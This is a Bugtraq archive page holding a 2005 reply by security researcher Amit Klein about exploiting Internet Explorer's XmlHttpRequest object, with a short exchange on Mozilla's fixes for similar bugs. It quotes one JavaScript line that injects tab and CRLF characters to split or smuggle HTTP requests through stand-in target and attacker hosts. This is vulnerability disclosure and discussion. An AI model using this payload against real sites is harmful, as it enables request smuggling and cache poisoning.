Bugtraq: Re: "Exploiting the XmlHttpRequest object in IE"

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein

From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Wed, 28 Sep 2005 18:06:49 +0200

On 27 Sep 2005 at 21:34, Yutaka OIWA wrote:

Hello Amit,

"Amit Klein (AKsecurity)" <aksecurity () hotpop com> writes:

  x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
  /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
  .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
  /1.0\r\nFoobar:","http://www.attacker.site/",false);


This kind of bugs are already fixed in recent Mozilla browsers,
as shown in your reference [4].

[4] "setRequestHeader can be exploited using newline characters", 
Bugzilla bug 297078
https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and 
"XMLHttpRequest allows dangerous request headers to be set", 
Bugzilla bug 302263
https://bugzilla.mozilla.org/show_bug.cgi?id=302263


see comment #15 of bug 297078.

https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15


Oh. I missed this. So - very good. And thanks for bringing this to Bugtraq's and mine 
attention. And while we're here - kudos for your work!

-Amit

By Date By Thread

Current thread:

"Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Amit Klein (AKsecurity) (Sep 24)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Yutaka OIWA (Sep 27)
  - Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Amit Klein (AKsecurity) (Sep 28)
- <Possible follow-ups>
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein anonymous (Sep 27)
- RE: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Sergey V. Gordeychik (Sep 30)